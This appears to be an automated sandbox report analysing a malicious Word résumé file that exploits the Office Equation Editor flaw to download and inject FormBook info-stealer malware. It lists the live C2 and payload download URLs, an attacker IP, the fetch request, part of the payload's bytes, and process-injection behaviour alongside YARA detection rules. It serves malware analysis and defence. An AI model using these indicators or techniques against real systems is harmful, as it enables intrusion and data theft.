Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report C.V_Job Request.doc

Overview

General Information

Sample Name:C.V_Job Request.doc
Analysis ID:510259
MD5:b5be29921304476377e096c60a3fb418
SHA1:653d40c3e86feb11b1cc6b7745257754c296c109
SHA256:fd4e52557f511c596e0d0ff58a1a7775a1295889461b73856d4aa733108e7b58
Tags:doc
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Sigma detected: EQNEDT32.EXE connecting to internet
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
Sigma detected: Droppers Exploiting CVE-2017-11882
System process connects to network (likely due to code injection or exploit)
Sigma detected: File Dropped By EQNEDT32EXE
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Modifies the prolog of user mode functions (user mode inline hooks)
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Office equation editor drops PE file
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Document has an unknown application name
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Contains functionality to call native functions
Potential document exploit detected (performs DNS queries)
IP address seen in connection with other malware
Downloads executable code via HTTP
Contains functionality for execution timing, often used to detect debuggers
Document misses a certain OLE stream usually present in this Microsoft Office document type
Contains long sleeps (>= 3 min)
Enables debug privileges
Document contains no OLE stream with summary information
Found inlined nop instructions (likely shell or obfuscated code)
Potential document exploit detected (unknown TCP traffic)
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Office Equation Editor has been started
Checks if the current process is being debugged
Potential document exploit detected (performs HTTP gets)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w7x64
  • WINWORD.EXE (PID: 940 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • EQNEDT32.EXE (PID: 1532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • seasonhd72463.exe (PID: 1812 cmdline: C:\Users\user\AppData\Roaming\seasonhd72463.exe MD5: 9227463FFB6E37D271919E06D175EDA7)
      • seasonhd72463.exe (PID: 2820 cmdline: C:\Users\user\AppData\Roaming\seasonhd72463.exe MD5: 9227463FFB6E37D271919E06D175EDA7)
        • explorer.exe (PID: 1764 cmdline: C:\Windows\Explorer.EXE MD5: 38AE1B3C38FAEF56FE4907922F0385BA)
          • msiexec.exe (PID: 2004 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 4315D6ECAE85024A0567DF2CB253B7B0)
            • cmd.exe (PID: 2176 cmdline: /c del 'C:\Users\user\AppData\Roaming\seasonhd72463.exe' MD5: AD7B9C14083B52BC532FBA5948342B98)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.agentpathleurre.space/s18y/"], "decoy": ["jokes-online.com", "dzzdjn.com", "lizzieerhardtebnaryepptts.com", "interfacehand.xyz", "sale-m.site", "block-facebook.com", "dicasdamadrinha.com", "maythewind.com", "hasari.net", "omnists.com", "thevalley-eg.com", "rdfj.xyz", "szhfcy.com", "alkalineage.club", "fdf.xyz", "absorplus.com", "poldolongo.com", "badassshirts.club", "ferienwohnungenmv.com", "bilboondokoak.com", "ambrosiaaudio.com", "lifeneurologyclub.com", "femboys.world", "blehmails.com", "gametimebg.com", "duytienauto.net", "owerful.com", "amedicalsupplyco.com", "americonnlogistics.com", "ateamautoglassga.com", "clickstool.com", "fzdzcnj.com", "txtgo.xyz", "izassist.com", "3bangzhu.com", "myesstyle.com", "aek181129aek.xyz", "daoxinghumaotest.com", "jxdg.xyz", "restorationculturecon.com", "thenaturalnutrient.com", "sportsandgames.info", "spiderwebinar.net", "erqgseidx.com", "donutmastermind.com", "aidatislemleri-govtr.com", "weetsist.com", "sunsetschoolportaits.com", "exodusguarant.tech", "gsnbls.top", "huangdashi33.xyz", "amazonretoure.net", "greathomeinlakewood.com", "lenovoidc.com", "qiuhenglawfirm.com", "surveyorslimited.com", "carterscts.com", "helmosy.online", "bakersfieldlaughingstock.com", "as-payjrku.icu", "mr-exclusive.com", "givepy.info", "ifvita.com", "obesocarpinteria.online"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18849:$sqlite3step: 68 34 1C 7B E1
    • 0x1895c:$sqlite3step: 68 34 1C 7B E1
    • 0x18878:$sqlite3text: 68 38 2A 90 C5
    • 0x1899d:$sqlite3text: 68 38 2A 90 C5
    • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
    00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      5.2.seasonhd72463.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        5.2.seasonhd72463.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        5.2.seasonhd72463.exe.400000.1.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x18849:$sqlite3step: 68 34 1C 7B E1
        • 0x1895c:$sqlite3step: 68 34 1C 7B E1
        • 0x18878:$sqlite3text: 68 38 2A 90 C5
        • 0x1899d:$sqlite3text: 68 38 2A 90 C5
        • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
        5.0.seasonhd72463.exe.400000.9.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          5.0.seasonhd72463.exe.400000.9.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1ab27:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bb2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 19 entries

          Sigma Overview

          Exploits:

          barindex
          Sigma detected: EQNEDT32.EXE connecting to internetShow sources
          Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 2.56.59.211, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 1532, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49165
          Sigma detected: File Dropped By EQNEDT32EXEShow sources
          Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 1532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exe

          System Summary:

          barindex
          Sigma detected: Droppers Exploiting CVE-2017-11882Show sources
          Source: Process startedAuthor: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\seasonhd72463.exe, CommandLine: C:\Users\user\AppData\Roaming\seasonhd72463.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\seasonhd72463.exe, NewProcessName: C:\Users\user\AppData\Roaming\seasonhd72463.exe, OriginalFileName: C:\Users\user\AppData\Roaming\seasonhd72463.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 1532, ProcessCommandLine: C:\Users\user\AppData\Roaming\seasonhd72463.exe, ProcessId: 1812

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.agentpathleurre.space/s18y/"], "decoy": ["jokes-online.com", "dzzdjn.com", "lizzieerhardtebnaryepptts.com", "interfacehand.xyz", "sale-m.site", "block-facebook.com", "dicasdamadrinha.com", "maythewind.com", "hasari.net", "omnists.com", "thevalley-eg.com", "rdfj.xyz", "szhfcy.com", "alkalineage.club", "fdf.xyz", "absorplus.com", "poldolongo.com", "badassshirts.club", "ferienwohnungenmv.com", "bilboondokoak.com", "ambrosiaaudio.com", "lifeneurologyclub.com", "femboys.world", "blehmails.com", "gametimebg.com", "duytienauto.net", "owerful.com", "amedicalsupplyco.com", "americonnlogistics.com", "ateamautoglassga.com", "clickstool.com", "fzdzcnj.com", "txtgo.xyz", "izassist.com", "3bangzhu.com", "myesstyle.com", "aek181129aek.xyz", "daoxinghumaotest.com", "jxdg.xyz", "restorationculturecon.com", "thenaturalnutrient.com", "sportsandgames.info", "spiderwebinar.net", "erqgseidx.com", "donutmastermind.com", "aidatislemleri-govtr.com", "weetsist.com", "sunsetschoolportaits.com", "exodusguarant.tech", "gsnbls.top", "huangdashi33.xyz", "amazonretoure.net", "greathomeinlakewood.com", "lenovoidc.com", "qiuhenglawfirm.com", "surveyorslimited.com", "carterscts.com", "helmosy.online", "bakersfieldlaughingstock.com", "as-payjrku.icu", "mr-exclusive.com", "givepy.info", "ifvita.com", "obesocarpinteria.online"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: C.V_Job Request.docVirustotal: Detection: 50%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.9.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.5.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.371add0.5.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.seasonhd72463.exe.36cb5b0.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.seasonhd72463.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.seasonhd72463.exe.400000.7.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000007.00000002.679087933.0000000000110000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461772968.00000000002C0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.446015383.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461730443.0000000000240000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679248868.0000000000370000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.679329977.00000000006F0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.422302029.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.461861564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.424749039.0000000003599000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.453979241.00000000095A6000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.421906811.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Antivirus detection for URL or domainShow sources
          Source: http://binatonezx.tk/seasonzx.exeAvira URL Cloud: Label: malware
          Multi AV Scanner detection for domain / URLShow sources
          Source: binatonezx.tkVirustotal: Detection: 15%Perma Link
          Antivirus detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4A35DA17-E94D-4691-827C-120A276E213C}.tmpAvira: detection malicious, Label: EXP/CVE-2017-11882.Gen
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\seasonzx[1].exeReversingLabs: Detection: 22%
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeReversingLabs: Detection: 22%
          Source: 5.0.seasonhd72463.exe.400000.9.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.seasonhd72463.exe.400000.5.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.seasonhd72463.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.0.seasonhd72463.exe.400000.7.unpackAvira: Label: TR/Crypt.ZPACK.Gen

          Exploits:

          barindex
          Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)Show sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\seasonhd72463.exe
          Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: Binary string: msiexec.pdb source: seasonhd72463.exe, 00000005.00000002.461806357.0000000000380000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: seasonhd72463.exe, msiexec.exe
          Source: global trafficDNS query: name: binatonezx.tk
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4x nop then jmp 005D1E35h
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4x nop then pop esi
          Source: C:\Users\user\AppData\Roaming\seasonhd72463.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop esi
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 4x nop then pop edi
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80
          Source: global trafficTCP traffic: 192.168.2.22:49165 -> 2.56.59.211:80

          Networking:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.lenovoidc.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.agentpathleurre.space/s18y/
          Source: Joe Sandbox ViewASN Name: GBTCLOUDUS GBTCLOUDUS
          Source: Joe Sandbox ViewIP Address: 2.56.59.211 2.56.59.211
          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Wed, 27 Oct 2021 14:42:17 GMTServer: Apache/2.4.48 (Unix) OpenSSL/1.0.2k-fipsLast-Modified: Wed, 27 Oct 2021 07:19:00 GMTETag: "80800-5cf50687391d8"Accept-Ranges: bytesContent-Length: 526336Vary: User-AgentKeep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 a4 78 61 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 fe 07 00 00 08 00 00 00 00 00 00 3e 1d 08 00 00 20 00 00 00 20 08 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 08 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 ec 1c 08 00 4f 00 00 00 00 20 08 00 e0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 08 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 fd 07 00 00 20 00 00 00 fe 07 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 e0 05 00 00 00 20 08 00 00 06 00 00 00 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 08 00 00 02 00 00 00 06 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 1d 08 00 00 00 00 00 48 00 00 00 02 00 05 00 10 be 00 00 c4 be 00 00 03 00 00 00 74 01 00 06 d4 7c 01 00 18 a0 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 26 02 28 17 00 00 0a 00 00 2a 00 00 1b 30 02 00 48 00 00 00 01 00 00 11 14 80 01 00 00 04 73 18 00 00 0a 80 02 00 00 04 00 7e 02 00 00 04 0a 16 0b 06 12 01 28 19 00 00 0a 00 00 7e 01 00 00 04 14 fe 01 0c 08 2c 0a 73 01 00 00 06 80 01 00 00 04 00 de 0b 07 2c 07 06 28 1a 00 00 0a 00 dc 2a 01 10 00 00 02 00 19 00 23 3c 00 0b 00 00 00 00 13 30 01 00 07 00 00 00 02 00 00 11 00 16 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 03 00 00 11 00 73 0b 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 04 00 00 11 00 73 52 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 05 00 00 11 00 73 54 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 06 00 00 11 00 73 a1 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 07 00 00 11 00 73 cf 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 08 00 00 11 00 73 da 00 00 06 0a 2b 00 06 2a 00 13 30 01 00 0b 00 00 00 09 00 00 11 00 73 80 00
          Source: global trafficHTTP traffic detected: GET /seasonzx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: binatonezx.tkConnection: Keep-Alive
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://computername/printers/printername/.printer
          Source: seasonhd72463.exe, 00000004.00000002.423882111.0000000000814000.00000004.00000020.sdmpString found in binary or memory: http://go.microsoft.c
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://investor.msn.com/
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://java.sun.com
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XML.asp
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
          Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: explorer.exe, 00000006.00000000.509688161.0000000003E50000.00000002.00020000.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.425477290.000000000031D000.00000004.00000020.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: seasonhd72463.exe, 00000004.00000002.425810745.0000000005060000.00000002.00020000.sdmp, explorer.exe, 00000006.00000000.447079678.0000000001BE0000.00000002.00020000.sdmp, msiexec.exe, 00000007.00000002.679548263.0000000001F70000.00000002.00020000.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
          Source: seasonhd72463.exe, 00000004.00000002.424515254.0000000002591000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000006.00000000.508717181.0000000002CC7000.00000002.00020000.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000006.00000000.443284470.0000000004650000.00000002.00020000.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehpT2P&
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp_2P&
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000006.00000000.430834779.00000000044E7000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000006.00000000.510496452.000000000460B000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000006.00000000.441403687.0000000002AE0000.00000002.00020000.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000006.00000000.449321006.0000000003DF8000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000006.00000000.510449681.00000000045D6000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM
          Source: explorer.exe, 00000006.00000000.446662524.0000000000255000.00000004.00000020.sdmpString found in binary or memory: https://support.mozilla.org
